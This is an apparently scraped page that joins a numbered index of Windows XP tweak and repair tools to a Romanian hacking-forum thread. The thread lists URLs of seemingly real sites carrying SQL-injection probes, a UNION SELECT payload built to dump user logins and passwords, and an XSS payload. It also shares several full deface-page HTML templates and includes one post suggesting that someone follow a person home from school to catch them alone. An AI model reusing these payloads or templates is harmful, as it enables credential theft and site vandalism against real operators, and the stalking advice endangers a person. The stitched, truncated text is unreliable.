Classic Start Menu - Undo Remove Send Feedback Menu Option 168. Clipboard Reader Read Host Files in Notepad 169. Shutdown Shortcut Enable or Disable Pinned Items on the Start Menu 170. Add Windows Explorer to the Right Click Expand "System" in the Start Menu/Control Panel 171. Enable or Disable Active Window Tracking Office XP Error 1706 - ProPlus.Msi Fix - O2K 172. Msinfo32 Batch File - To Gain Access Add System Information to the Right Click 173. Repair the Registry Editor Stops the Selective Startup Screen 174. Remove Added IE Toolbar Entries Restore Media Files 175. Restore Empty/Full Icons - Recycle Bin Restore Right Click .inf/Install 176. Add XP Google Group Search to IE Toolbar Add MS Knowledge Base to the IE Toolbar 177. Restore the Web Tab - Display Properties Restrict Changes from Being Made in OE - Undo 178. Restore the Go Button Disable Open in a New Window 179. Window Metrics - Shell Icon - Repair Windows Update Greyed Out - Restore 180. Add a Folder Under the Run Command Add Attributes/InfoTips to Files and Folders 181. Account SID Association (run w/ cscript) Network Login Profile (run with cscript) 182. User Account Information (run w/ cscript) Listing Local User Account Information (SID) 183. View Source - Restore Notepad as Default View Source - Add or Change Editor (Also for 6) 184. Disable Thumbnail Cache Restore Jdbgmgr.Exe (3805) For Build 3810 185. Remove Desktop Version from Desktop Remove Icon Shortcut Symbols - Restore 186. Restore Run As to the Right Click - Undo Show File and Folder Names Using Correct Case 187. Restore Themes Functionality Restore Luna Theme - Restore Classic Theme 188. Add or Remove - Administrator Error Add Save & Restore Desktop Layout to Menu 189. Correct DirectX 9 "Logo Error" Correct Windows Media Player 9 "Logo Error" 190. Hide Selected/Specific File Extension Paths Customize Auto Hide Taskbar Settings 191. Change CD/RW, DVD Name in Explorer Restore Paint 192. Change .bmp Default to Paint Restore the Toolbars From Being Greyed Out 193. Remove Hotfixes from Add or Remove Disable Messenger from Outlook 194. Disable Highlight New Programs - Undo Language Bar Remove - Restore 195. Restore Wallpaper Views Restore Desktop Icons and Taskbar 196. Sort All by Alphabet - Start Menu and Fav's - Undo Top 10 XP Most Frequently Asked Q & A 197. Display Simple Folder View - Undo Remove Shared Documents - Undo 198. Add Open Target Folder to Context Menu Enable or Disable Ctrl/Alt/Delete 199. Enable Folder and Icon Refresh Hide Recycle Bin on Desktop - Not from Explorer 200. Disable Save This Program to Disk Option Change Thumbnail View to 96 or 32 201. Restore marscore.dll Disable IE HTML Source Editor Check - Undo 202. Disable Notepad being listed under FUP Set Magnify Options Back to Default 203. Restore Display Icon in Control Panel Restore Right Click Properties 204. Force Auto Refresh - Undo Restore Power Schemes/Configurations 205. Backup DUN Settings Disable the Auto Logon Shift Override Feature 206. Hotbar - Explorer/New Freezes Remove Hand Icon for Shared Resources - Undo 207. Hide User Name in Start Menu - Undo Restore Properties - My Computer & Documents 208. Disable Update Device Driver Wizard Undo Remove Add or Remove Restrictions - Undo 209. Remove "Shortcut to..." Prefix on Shortcuts Open Each Folder in New or Same Window 210. Allow Folder Names in Uppercase Change the Number of Recent Documents to 25 211. Restore Startup and Shutdown Sounds Disable Sticky Keys or Delete Sticky Keys 212. Disable - Use the Web Service to find ... Disable .Net Passport Balloon Pop-up - Restore 213. Disable or Enable Registry Editing Tools Display Mouse Pointer Trails - Undo 214. Windows/Buttons Greyed Out -Appearance Windows XP Style Changes to Windows Classic 215. Advanced Tab Missing in IE - Restore Set Folder Default to Open & Use Same Window - Explore 216. Set Toolbar Backgrounds back to Default Remove My Computer from Desktop/Start Menu 217. Set Stretch - Set Center - Set Both Highlight Text Blue - Set own Customized Color 218. Disable Save As MRU Restore Taskbar Grouping - Remove 219. Re-Run Missed Tasks Notification - Undo Remove the Display Icon from the Control Panel 220. Restore Open With on the Right Click Remove Overture Search Branding in IE 221. Set SnapTo and Mouse Trails as Default Restore System Information (Msinfo32) 222. Restore Address Bar Search - Google Restore Save As Web Page Complete 223. Align Drop Down Menu's to the Right Enable or Disable Storage of .Net Passwords 224. Show Control Panel on the Start Menu Restore Disk Management Snap-In Extension 225. Restore Folder Options/Internet Options - Disable Change the Logon Screen Saver Automatically 226. Remove the Taskbar Remove the White Space from Add or Remove 227. Set IE Text Font to Smaller or Larger Restore/Enable Screensaver Tab Settings/Display 228. Use Small Icons for Start Menu Programs Restore CMD.EXE 229. Set IE Search to Default Open TIF Images within Internet Explorer 230. Restore Group Policy Snap-in Wait is Greyed Out under Screen Saver Tab 231. Show Favorites Expanded Set Internet Explorer to Full Screen - Undo 232. Lift Screen Saver Restrictions - Admin Change Screen Saver Automatically 233. Enable Single Click to Open an Item Enable Drag and Drop 234. Automatically Resize Image in IE Window AutoPlay Repair Tool 235. Restore Help and Support Service Set Splash Screen to None - Remove OEM 236. Appearance/Effects - Restore Smooth Edges Enable or Disable Clear Type under Effects 237. Change Hard Drive Icon in Explorer Alt-Tab Replacement PowerToy 238. Disable Update Checks for Internet Explorer Remove Keylogger Reg Files 239. Disable Local Stylesheets in Internet Explorer Close Command Greyed Out in IE and WE 240. Programs Aren't Minimized in the Taskbar Restore My Music Folder on the Start Menu 241. Windows Server 2003 Resource Kit Tools Restore Choose Program - Open With 242. Set the "Save Attachments" Default in OE Disable Background Notice Balloon in Messenger 243. Allow Changes Being Made to Taskbar Taskbar Toolbar Menu is Greyed Out - Restore 244. Disable File Deleted Confirmation - Undo Remove Restriction on Recycle Bin Size Limit 245. Remove the ">" from OE Forwarded E-Mail Set the Address Bar to IE/XP Default 246. Restore Show Desktop Icons Context Menu TweakUI with XP SP1 - TweakUI without SP1 247. Set IE to Check for Default Browser Enable the Favorites Wizard Restriction 248. Enable or Disable Scroll Programs Clear Page File on Exit - Undo 249. Set Default XP Font Back to Tahoma Restore My Network Places to the Desktop 250. List Loaded and Installed Device Drivers Restore Hotmail, Outlook and OE under Programs 251. Outlook Express - Reply At End Specify Exe Files to be Lauched by Winlogon 252. Download OE Quote Fix Restore Remote Access Connection Manager 253. Lan Settings- Proxy Server - Disable PSP Thumbnail Handler - Paint Shop Pro 254. Remove JRE - Sun TreatAs Entry Disable or Enable Downloads per User in IE 255. Restore Group Policy Snap-In My Documents Folder Opens Upon Boot (for C:\) 256. Restore the Control Panel - Disable : Current , Local, Both Effects Options are Greyed Out - Appearance 257. Remote Procedure Call Worm A-E - Edit Win XP Security Patch: Buffer Overrun In RPC e 258. Remove the W32.Randex.E Worm Do you have a 32 or 64 bit in XP? Exe or VBS 259. Online Virus Scanner: Trend - Symantec Kaspersky Labs Anti-Virus Software 260. Open New IE Window is Blank - Fix System32 Folder Opens Upon Boot 261. List of Startup Programs Running at Login Restrict Desktop Theme Controls 262. Remove W32. Sobig.F Worm Prevent Manipulations of the Taskbar 263. Disable Default Save As to My Pictures Restore Winlogon\Userinit 264. Restore Missing Tabs to Task Manager Access Denied - CD Rom, Floppy, Removable 265. Default XP Calculator Enlarged Restore Search to the Context Menu 266. Prevent Prompting for Hotfix KB828026 Lock Internet Explorer Toolbar Options in Place 267. Restore "Turn Off and Log Off" - Start Menu Restart the Shell Automatically 268. Restore All Tabs under Internet Options Restore RasMan Service to Automatic 269. Disable or Enable Resize Graphic - Send To Hide Start Up Scripts 270. Connect To - Restore Options Restrict Changes Made to Connections - Undo 271. Stuck in Classic View? Undo Now Notepad with Spell Check and More 272. Remove Network Places - Undo Prevent Prompting for Hotfix Q811493 273. Outlook Mail Counter on Welcome Screen Restore Offline Files Tab - Folder Options 274. Repair the Office XP Shortcut Bar/Buttons Add Open New Browser Window to IE Toolbar 275. Lift Restrictions - TM, Regedit and CMD Search for Network Folders and Printers - Undo 276. Enable/Disable My Computer Icon Enable/Disable Taskbar Grouping 277. Enable or Disable Thumbnail View Restore Show Net Connections - Connect To 278. Restore/Enable System Restore - Undo Disable Start Menu Pin To List - Enable 279. Clear File Name MRU Change/Customize Branding in Outlook Express 280. Restore Defrag.Exe W32.Swen.A@mm Removal Tool 281. Disable the Floppy Drive - Enable OETune Sets Individual Sounds To Mail Folders 282. Enable the Appearance Tab - Display Disable All Internet Explorer Toolbars - Undo 283. Restore Content Advisor to Default Settings Add the Outlook 2003 Icon to the Desktop 284. Restore or Remove Manage - Context Menu Reveal Hidden Dll Files/Icons - Undo 285. Restore/Replace the Manage CLSID Default Restore All Display Tabs - Remove All Display Tabs & Icon 286. Restore the "New" Context Menu to Default Search asks for Office CD 287. Restore Download to Directory Setting Restore Search - Indexing Service 288. Restore Cryptographic Service - CryptSvc Add Run in Separate Memory - 16 bit 289. Start Menu - Enable Restore System Restore Service 290. Hide Inactive Icons - Greyed Out Open My Computer - Double Pane or Single Pane 291. Restore Defrag Snap-In Restore My Computer Manage 292. Update Rollup 1for XP View All Running Processes 293. Remove Media Player from Toolbars - Undo QHosts Removal Tool 294. Prevent Check Disk Upon Boot - Undo Hide or Show Notification Area Icons 295. Lift Active Desktop Restrictions Suppress Online Media Content via the Media Bar 296. Lift MMC/GPEDIT Snap-In Restrictions Cannot Create Toolbar (QL) - .REG or .VBS 297. Disable the Taskbar Context Menus Remove Taskbar/ Start Menu from Control Panel 298. Taskbar Repair Tool Plus! Hide System Clock - Undo 299. List Administrative Tools in Control Panel Microsoft Glossary and Acronyms 300. Restore the Machine Debug Manager Enable or Disable the Outlook Express Toolbar 301. Lock XP with Fast User Switching Enabled Restore .ico File Associations 302. Disable CMD Require Alphanumeric Windows Password 303. Hide Share Passwords with Asterisks Disable the Windows XP Tour 304. Cardfile Replacement of MS cardfile.exe Show Window Contents While Dragging - Undo 305. Set .vbs Files to Open as Default Set Txtfile to Default to Notepad 306. Decryption of XP Files Clear Recent Media Player List - Undo 307. Disable Monitor Power-off on Logon Screen Save Attachments OE - Greyed Out 308. Clear Run Commands Selectively Restore Wordpad.Exe 309. Restore Accessories - Start Menu/All Prog Outlook - Minimize To System Tray 310. Restore Services to Default Messenger Service Add 311. Doug's Windows XP Security Console NCS Account View/Account Management 312. Save User Name and Password Greyed Out Restrict Author Mode in MMC 313. CWShredder version 2.1 IE Crashes - Browse in New Process 314. File Associations are Greyed Out Remove Properties from My Computer 315. Maximize Help and Support - Undo OE - Read in Plain Text Only 316. Show Network Icon When Connected Sound Icon - Enable 317. Aida32 Final Release Scan for Hardware Changes 318. Disable View of C Drive - Undo Remove Copy To/Move To 319. End/Refresh Process on Explorer.Exe Show only IE URLS - Undo 320. Restore Volume/Net Icon to Notification Area Clock: Day/Month/Date/Year/Time 321. Tool Tips Hidden Behind Taskbar W32.Sasser Removal Tool 322. Remove Toolbar Restriction A File Named ~ Appears on the Desktop 323. Add or Remove Programs Appears to Stop Responding 16-bit COM Applications Stop Responding 324. The NET SEND Command May Not Work Correctly You cannot Start a Program with an .exe Extension 325. Snap-in Creation Failed (gpedit.msc) Restore CMD File Association 326. Restore Notepad.exe Run Command Creator 327. How to Use the SPCheck Tool in Windows XP Restore Play All 328. Solving msdart.dll Problems Delete/Copy by Owner Utility for Windows XP 329. Task Manager - High or Normal Windows Memory Diagnostic 330. Restore Single Click Underline Icons Test for USB2 331. Remove Browser Objects - Place in Startup Folder DBXtract Extracts all Mail/News Messages 332. Look2Me Uninstaller DotNetInstaller.exe is Missing 333. Plus! for Win XP Recovering XP using the Recovery Console 334. How to Set up a Custom 404 Error Page XP Service Controller 335. Breakdown list of Unknown Devices Two Windows Update Tabs - System Properties 336. Pinball - Restore Hide Applications from Add or Remove 337. Temporarily Disable XP Service Pack 2 Install Restore Change or Remove Programs 338. Restore USB Service Restore the Security Center Service 339. XP Web\Wallpaper Defaults Remove Print Directory 340. Data Recovery - Restorer2000 Disable Standby 341. Show All Drive Letters After the Label Show All Drive Letters Before the Label 342. Show Network Letter Before - Drive Letter After Never Show Drive Letters 343. Hide Connections Tab - Per User - Per System Restore the Missing "File" Menu 344. Help and Support Default in XP Restore Calc.Exe 345. Dialog Boxes are Blank - Winnt - Windows Remove Help and Support Search History 346. For Everything Else Error Message: MS-DOS or 16-bit Windows-based program 347. Cleaning up after installing SP2 Back Button Not Working Properly and Host File Issue 348. Send To Desktop (Create Shortcut) Fix Windows Installer Issues 349. Restore Winsock - Fix Right Click - Error 350. SHCreateThreadRef Could Not Be Located (SHLWAPI.dll) ToolTips do not Display Complete Info - Network Share 351. Test Your SP2 Pop-up Blocker SHERLOCK - The Codec Detective! 352. Connect to the Internet After Installing a Modem Remove ASPNET from Welcome Screen for Auto Logon 353. Bandwidth Monitor - with Notification Area Icon Fix Save As Type from .JPEG to .JPG 354. Date 2 File or Directory or VB Script/Batch Auto End Tasks per User or Per System 355. Change RDP-Tcp Port Number Restore Search to the Context Menu 356. Remove Network Places from Windows Explorer - Undo Problems Opening PDF Files in Internet Explorer 357. Disable the Desktop Top Wizard Set the Default Browser for your User Profile 358. Preview all file types via Display Properties - Without tags Junction Link Magic - Creating Target Folders 359. Microsoft Windows AntiSpyware Restore Offline Cache Index.dat 360. Current User Search Assistant Key - Written for C and Winnt Fix No Ping Command 361. List of Processes under the Task Manager Shell Extensions Manager 362. Default Service Status - Double Click for Service Info Scancode Mapper 363. Enable Flash for IE - Disable Flash for IE Search Text - .SQL 364. Enable Autorun Disable Menu Bars and the Start Button 365. Remove WMP Start Menu Shortcuts for new Users - Undo Update for DRM-enabled Media Players 366. StatBar - System Status Bar Disable Installer - Enable Installer 367. OE - Reset Compact Check Count to 0 - Undo Optimize Hard Drive When Idle - Undo 368. Folder Options/View Empty - Restore Now Internet Explorer - New Process - Per User or Per System 369. Prevent MS Tools - KB890830 from reinstalling Prevent KB890859 from being Reinstalled 370. Sun Java On - MS Java On RunAs - Encrypted 371. Restore Sound - Windows Audio Service Taskbar : Control/Select Order 372. Quick Restore Point Adding sites to the Allow list 373. Shutdown Event Tracker - Add to Event Viewer Add Run Programs to Recent Documents 374. Security Center Alert Settings - Enable or Disable Restore the .reg file 375. Event Log Explorer MSEvents.MSEvents - remove 376. Slow Network - File/Shared/Remote Reset Default Settings of HTML Help Control 377. Dell My Way Search Assistant Uninstaller Cryptographic Service Fix - Torgeir Bakken 378. Restore Accounts under Tools for OE No Update Check in IE - Undo 379. OpenExpert- Open With Submenu Address, Lan, MP, Links: Remove - Restore 380. Restore Directory and Folder Shell Norton Removal Tool 381. Event Viewer Redirect: Apply - Undo Recover Product Keys of Win and MS Office 382. HijackThis.Exe 383. Disable User Tracking - Enable HP's Share-to-Web Software - Fix 384. Show Updates - Don't Show Killbox.Exe - Awesome Tool 385. Ctfmon.Exe: Remove - Restore Disable Send To from the Context Menu - Undo 386. All Users.Windows - Replace Default Firewall On - Firewall Off 387. Disable Paging Executive Removable Devices- AutoPlay: Off or On 388. USB Drive Letter Manager 389. Shortcut to Run, Min All, UndoMin All Disable Automatic Delivery of of IE 7 390. Restore Msagent Folder VBS Restore 391. Disable Writing to Pen Drives - Enable Disable Error Mode 392. 2007 DST Fix - English Systems Enable/Disable - Network Connection 393. Removes ALL the Spyware Spyware Cleaners that WORK! 394. File Research Center Remove/Restore Network Icon - System Tray 395. Remove or Restore "New" Context Menu Add Control Panel - Start Button (Right Click) 396. Add Recycle Bin to Folder Options Add "Crash Windows" to Folder Options 397. Hotfix Request Web Submission Form Remove Accessibility Options from CP 398. Pin Folder to Start Menu - Shift/Right Click/Pin Using Win98 Plus! on XP 399. Always wait for network Enable - Disable Restore CD/DVD in Explorer 400. USB Port Fix IPOD Fix 401. Enable or Disable WMP Screen Saver PV Desktop Manager Toolbar - Remove 402. Restore Active Desktop - IE7 Remove Windows Service Pack Blocker Tool Kit 403. Restore All Users - All Programs FileOpenPatcher - ElmueSoft 404. Prevent Autorun.inf Virus Screen Saver Enable or Disable 405. Show Newly Installed Programs Restore Blue Tooth - Control Panel 406. Local Users and Groups - Hide / Undo Task Manager Minimize on Use - Undo 407. Enable/Disable Prefetcher Uninstall the XCP Software - RootKit 408. IE7 - Fix Run Once SP3 Removes IE Desktop Shortcut - Fix 409. Windows XP Product Key Modifier Remove Locked Regfiles - RegDelNull 410. CFTMON.EXE Remover (all versions) Fix IE7 Drag and Drop 411. Release/Renew/Flush/Register DNS Fix Slow Hotkeys 412. AutoRun Eater - Can't find Recycler.... Stop the Reboot nag screen after Windows Updates 413. Hide All Notification Icons - Near Clock Disable Messenger from MS Client - Undo 414. Tips on Cleaning Up Spyware, etc.... View Taskbar Groups Vertically - WinKey + D to undo 415. SpamWise RoboView Prevent Prompting for Hotfix KB960859

Up! http://www.moslerauto.com/news.php?id=64' http://www.chwb.org/regional/news.php?id=64' http://www.calidus.ro/en/news.php?id=2' http://www.tiarra.ro/news.php?id=%27%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E%27 [COLOR="#FF0000"]http://romaniadanseaza.a1.ro/concurs/list.php?id=-2%20union%20all%20select%201,2,group_concat(user_id,0x3a,login,0x3a,password)%20FROM%20users--[/COLOR]

Cauta un prieten cu masina si dute la liceu,urmarestel pana acasa,asa afli si unde sta si poate aisi sansa sa-l prinzi singur si sa stai de vb cu el. P.s - E doar o idee.

Nu am zis ca au ceva nou sau ceva deosebit,sau cel putin facute de mine. Ideea era ca acum cateva zile am vazut un topic in care cineva a cerut un asa ceva,si am zis sa postez cateva.

2. <HTML><HEAD><TITLE>Defaced</TITLE> <STYLE type=text/css>BODY { SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-BASE-COLOR: #000000} </STYLE> <META http-equiv=Content-Type content="text/html; charset=windows-1251"> <SCRIPT language=JavaScript> <!-- function SymError() { return true; } window.onerror = SymError; //--> </SCRIPT> <!--[if IE ]> <STYLE type=text/css>BODY { OVERFLOW: hidden } v\ { BEHAVIOR: url(#default#VML) } </STYLE> <![endif]--> <SCRIPT language=Javascript><!-- var tl=new Array( "=======================", "You have been", "DEFACED", "=======================", "Learn to make a better website.", "Your shit at it.", "Cry to your mum.", "=======================", "Name of Hacker." ); var speed=50; var index=0; text_pos=0; var str_length=tl[0].length; var contents, row; function type_text() { contents=''; row=Math.max(0,index-20); while(row<index) contents += tl[row++] + '\r\n'; document.forms[0].elements[0].value = contents + tl[index].substring(0,text_pos) + "_"; if(text_pos++==str_length) { text_pos=0; index++; if(index!=tl.length) { str_length=tl[index].length; setTimeout("type_text()",500); } } else setTimeout("type_text()",speed); } //--></SCRIPT> <STYLE fprolloverstyle="">A:hover { COLOR: #000000; TEXT-DECORATION: overline } INPUT { BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Arial, Helvetica, sans-serif; COLOR: #FFFFFF; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000 } TEXTAREA { BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Arial, Helvetica, sans-serif; COLOR: #FFFFFF; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000 } SELECT { BORDER-LEFT-COLOR: #000000; BACKGROUND: #000000; BORDER-BOTTOM-COLOR: #000000; FONT: 12px Verdana, Arial, Helvetica, sans-serif; COLOR: #FFFFFF; BORDER-TOP-COLOR: #000000; BORDER-RIGHT-COLOR: #000000 } </STYLE> <META content="Microsoft FrontPage 6.0" name=GENERATOR></HEAD> <BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgColor=#000000 onload=type_text() <P><!-- server 3 --><p align="center"><iframe style="visibility: show !important; height: 60px !important; width: 468px !important; margin: 3px 0px 3px 0px !important;" framespacing="0" frameborder="no" scrolling="no" width="468" height="60" allowtransparency="true"></iframe><a href="#" onclick="return closeBanner(this.parentNode);" style="position:relative;top:-51px;left:0px;"><img border="0" src="http://ads.3xmedia.ro/close.png" width="12" height="12" /></a></p> <script type="text/javascript" src="http://www.hi2.ro/banner.do"></script><BR></P> <TABLE height=250 cellSpacing=0 cellPadding=0 align=center border=0> <TBODY> <TR> <TD colSpan=3 height=303> <TABLE cellSpacing=0 cellPadding=5 width=680 border=0 height="604"> <TBODY> <TR> <TD width=670 height="528"> <p align="center"><b><font face="Arial Black" size="5" color="#FFFFFF">Name of Hacker. <p align="center"> <img border="0" src="" width="350" height="60"></p> <p align="center"> </p> <H2 align=center><FONT face=Impact color=#ffffff></FONT><FONT face=Impact color=#ff0000></FONT></H2><FONT face=Impact color=#FFFFFF></FONT> <CENTER><FONT face=Impact color=#FFFFFF></FONT> <FORM><FONT face=Impact color=#FFFFFF><TEXTAREA rows=24 cols=92></TEXTAREA> </FONT></FORM></CENTER></TD></TR> <TR align=middle> <TD width="670" height="19"></TD></TR> <TR> <TD align=right width="670" height="29"></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE> <EMBED src='http://greencall.co.kr/.p/we_will_not_go_down.swf' width=0 height=0 type=application/x-shockwave-flash> <!-- server 3 --> </BODY></HTML> <!-- server 3 --> </BODY></HTML> Demo: Defaced 3. Asta e caterinca rau ) lasati-l sa ruleze pana la capat. <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hacked</title> <style type="text/css"> body{ margin-top:40px; background:#000000; color:#2186E6; } #h { margin:0px; font:11px black Arial; font-weight:bold; border:4px ridge Judge dead; background-color:#B0B0B0; width: 500px; border-collapse:collapse; } #h tr.bl { background-color:black; margin:0px; } #cmd { font-size:16px; color: #2186E6; font-weight:bold; font-family:"Lucida Console",Courier; background:#000000; width: 600px; height: 250px; text-align:left; } #cursor { text-decoration:blink; font-weight:bold; } </style> <script language="JavaScript"> var tl= new Array( "Your Website is Hacked !", "Security is wrong.", "", "$ .\\/getcwd -a", "parse($data);", "", "connecting to your ip, please wait...", "", "root@you:~ #", "root@you:~ # rm -rf /", "Deleting all data stored in C:\\\...", "Done.", "", "Inactivity detected...", "", "", "", "# # # ##### # # ####### ###### ### ", "# # # # # # # # # # # ### ", "# # # # # # # # # # ### ", "####### # # # ### ##### # # # ", "# # ####### # # # # # # ", "# # # # # # # # # # # ### ", "# # # # ##### # # ####### ###### ### " ); var speed=55; var index=0; text_pos=0; var str_length=tl[0].length; var contents, row; function type_text() { contents=''; row=Math.max(0,index-9); while(row < index) { contents += tl[row++] + "<br />"; } document.getElementsByTagName('pre')[0].innerHTML = contents + tl[index].substring(0,text_pos) + "<font color=black id=cursor> _</font><br />"; if(text_pos++==str_length) { text_pos=0; index++; if(index!=tl.length) { document.getElementById('cursor').style.color='Judge dead'; str_length=tl[index].length; setTimeout("type_text()",1000); } } else { document.getElementById('cursor').style.color='black'; setTimeout("type_text()",speed); } } </script> </head> <body onload="type_text();"> <div align=center> <img src="logo.png" alt="" /><br /> <table id="h"> <tr width="100%"> <td align="left"><img src="http://i.imgur.com/AkEYY.png" /> Invite de commande: <?php echo $_SERVER["REMOTE_ADDR"]; ?></td> <td align="right"><img src="http://i.imgur.com/w6Sg0.png" /></td> </tr> <tr class="bl"> <td align="right"><pre id=cmd></pre></td> <td></td> </tr> </table> </div> </body> </HTML> Demo: Hacked

Asta e sursa de unde l-am luat: http://www.beans-company.ne.jp/jihad.htm

Pur si simplu mi-a placut si am zis sa-l impart cu voi. Nu e facut de mine. 1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <SCRIPT LANGUAGE="JavaScript"> <!-- document.oncontextmenu = function(){return false} if(document.layers) { window.captureEvents(Event.MOUSEDOWN); window.onmousedown = function(e){ if(e.target==document)return false; } } else { document.onmousedown = function(){return false} } // --> </script> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>:>=== Hacked By BLA BLA ===<:</title> <link rel="shortcut icon" href="http://4.bp.blogspot.com/_6vQUmqm2JkQ/TPYtGM_gB0I/AAAAAAAAGRc/57LwMNfTIvU/s640/romania-flag.JPG"> <style type="text/css">body, a, a:hover {cursor: url(http://hellox.persiangig.com/DefacePage/negro.cur), progress;}</style> <!-- CSS --> <link rel="stylesheet" type="text/css" href="http://hellox.persiangig.com/DefacePage/jquery00.css" media="all"> <link rel="stylesheet" type="text/css" href="http://hellox.persiangig.com/DefacePage/prettyPh.css" media="all"> <link rel="stylesheet" type="text/css" href="http://hellox.persiangig.com/DefacePage/style000.css" media="all"> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery-1.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/cufon-yu.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/Yanone_K.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery00.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery01.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery02.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery03.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery04.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery05.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery06.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/jquery07.js"></script> <script type="text/javascript" src="http://hellox.persiangig.com/DefacePage/custom00.js"></script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-20402842-6']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src ='http://hellox.persiangig.com/DefacePage/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script><script language="JavaScript" type="text/javascript"> mensaje = '*<--Hacked By BLA BLA -->*';font = 'arial';size = 2.5;color = '#00FF00';velocidad = 0.6; n4 = (document.layers);ie = (document.all);n6 = (document.getElementById); mensaje = mensaje.split('');n = mensaje.length; a = size*10;ymouse = 0;xmouse = 0;props = "<font face="+font+" color="+color+" size="+size+">"; if (n4){for ( i = 0; i < n; i++)document.write('<layer left="0" top="0" width="+a+" name="n4mensaje'+i+'" height="+a+"><center>'+props+mensaje[i]+'</font></center></layer>');}else if (ie){document.write('<div id="padre" style="position:absolute;top:0px;left:0px"><div style="position:relative">');for (i=0; i < n; i++)document.write('<div id="iemensaje" style="position:absolute;top:0px;left:0;height:'+a+';width:'+a+';text-align:center">'+props+mensaje[i]+'</font></div>');document.write('</div></div>');}else if (n6){document.write('<div id="padre" style="position:absolute;top:0px;left:0px"><div style="position:relative">');for (i = 0; i < n; i++)document.write('<div id="iemensaje'+i+'" style="position:absolute;top:0px;left:0;height:'+a+';width:'+a+';text-align:center">'+props+mensaje[i]+'</font></div>');document.write('</div></div>');} if(n4)window.captureEvents(Event.MOUSEMOVE); function Mouse(evento){ if(ie){xmouse = event.x+20;ymouse = event.y+20;}else if(n4 || n6){xmouse = evento.pageX+20;ymouse = evento.pageY+20;}} if(n4)window.onMouseMove = Mouseelse if(ie || n6)document.onmousemove = Mouse; y = new Array();x = new Array();Y = new Array();X = new Array();Yaux = new Array();Xaux = new Array(); for (i=0; i < n; i++){y[i] = 0;x[i] = 0;Y[i] = 0;X[i] = 0;Yaux[i] = 0;Xaux[i] = 0;} function asigna(){if (ie)padre.style.top = document.body.scrollTop; for (i = 0; i < n; i++){if(n4){document.layers['n4mensaje'+i].top = y[i];document.layers['n4mensaje'+i].left = x[i]+(i*(a/2));}else if(ie){iemensaje[i].style.top = y[i];iemensaje[i].style.left = x[i]+(i*(a/2));}else if(n6){eval("document.getElementById('iemensaje"+i+"').style.top = '"+y[i]+"px'");eval("document.getElementById('iemensaje"+i+"').style.left = '"+(x[i]+(i*(a/2)))+"px'");} }} function ondula(){y[0]=Math.round(Y[0] +=((ymouse)-Y[0])*velocidad);x[0]=Math.round(X[0] +=((xmouse)-X[0])*velocidad); for (var i = 1; i < n; i++){Yaux[i] = Math.round(Y[i]);Xaux[i ]= Math.round(X[i]);y[i] = Math.round(Y[i]=Yaux[i]+(y[i-1]-Y[i])*velocidad);x[i] = Math.round(X[i]=Xaux[i]+(x[i-1]-X[i])*velocidad);}asigna();setTimeout('ondula()',50);} window.onload = ondula; </script> </head> <body> <!-- wrappage begin here --> <div id="wrappage"> <!-- container begin here --> <div class="container"> <!-- top block begin here --> <div class="top"> <div class="energy"></div> <div class="top-block"> <a class="logo">Hacked By BLA BLA </a> <div class="bg-e-button"></div> <a href class="open"><img src="http://hellox.persiangig.com/DefacePage/flash000.png" alt=""></a> </div> </div> <!-- top block end here --> <!-- center block begin here --> <div class="center-block"> <!-- ???? --> <div class="scanner clearfix"> <div class="scanner-block"> <div class="scanner-box left"> <div class="scanner-line"></div> </div> <ul class="data left"> <li class="search"> Identificare.... </li> </ul> </div> </div> <!-- ??? ???? --> <div class="main"> <div class="load"></div> <div class="shut-left"></div> <div class="shut-right"></div> <div class="page"> <div class="box-left left"> <div class="info"> <ul class="socicon left"> <li><a href="https://www.facebook.com/" target="_blank"><img src="http://hellox.persiangig.com/DefacePage/facebook.png" alt=""></a></li> <li><a href="http://www.twitter.com/" target="_blank"><img src="http://hellox.persiangig.com/DefacePage/twitter0.png" alt=""></a></li> <li class="last"><a href="" target="_blank"><img src="http://hellox.persiangig.com/DefacePage/dribbble.png" alt=""></a></li> </ul> <img src="http://4.bp.blogspot.com/_6vQUmqm2JkQ/TPYtGM_gB0I/AAAAAAAAGRc/57LwMNfTIvU/s640/romania-flag.JPG" alt="" class="right" width="122" height="104"> <ul class="left who"> <strong><font color="white"></font></strong></br> </ul> </div> <ul id="menu" class="right"> <li> <a href="#msg" class="selected">Message</a> <a href="#about" class="selected">About</a> </li> </ul> </div> <div class="cont left"> <!-- ????? --> <div id="msg" class="box left"> <div class="box-content"> <strong><font color="green ">Your Site Hacked By _______________</font></strong></br> <strong><font 